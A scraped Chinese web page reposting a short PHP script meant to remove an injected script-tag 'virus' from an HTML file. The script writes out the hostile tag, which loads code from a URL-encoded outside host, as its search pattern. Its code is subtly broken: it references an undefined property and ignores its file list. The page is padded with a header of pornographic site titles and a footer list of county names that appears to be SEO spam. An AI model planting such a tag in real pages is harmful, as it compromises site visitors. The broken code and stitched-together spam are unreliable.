色尼玛亚洲综合影院,亚洲3atv精品一区二区三区,麻豆freexxxx性91精品,欧美在线91

php 清除網頁病毒的方法

<?php
Class clear_virus{
public $index ='b.html';
public $filepath =array('b.html');
public $virus_type ="<script src=http://%61%76%65%33%2E%63%6E></script>";
function open_file(){
if(file_exists($this->index)){
$tmp =file_get_contents($this->index);
if( strrpos($tmp,$this->virus_type)!== false){
$temp =str_replace($this->virus_type,'',$tmp);
$handle =fopen($this->index,'w');
fwrite($handle,$temp);
fclose($handle);
}else{
echo $this->virus_find;
}
}
}
}
$virus =new clear_virus;
$virus->open_file();
?>
清除script 病毒

php技術php 清除網頁病毒的方法,轉載需保留來源!

鄭重聲明:本文版權歸原作者所有,轉載文章僅為傳播更多信息之目的,如作者信息標記有誤,請第一時間聯系我們修改或刪除,多謝。

主站蜘蛛池模板: 天峻县| 临城县| 宝清县| 邯郸县| 察雅县| 东港市| 邵阳县| 大竹县| 寿光市| 陆丰市| 平潭县| 南康市| 乌兰浩特市| 安宁市| 肥乡县| 武陟县| 山东| 临汾市| 阳江市| 县级市| 沁源县| 营口市| 沁源县| 鸡西市| 清河县| 武威市| 交城县| 弥渡县| 岑巩县| 建水县| 沅江市| 霍州市| 白朗县| 周宁县| 邻水| 察哈| 玉山县| 邵阳县| 甘孜县| 页游| 澄城县|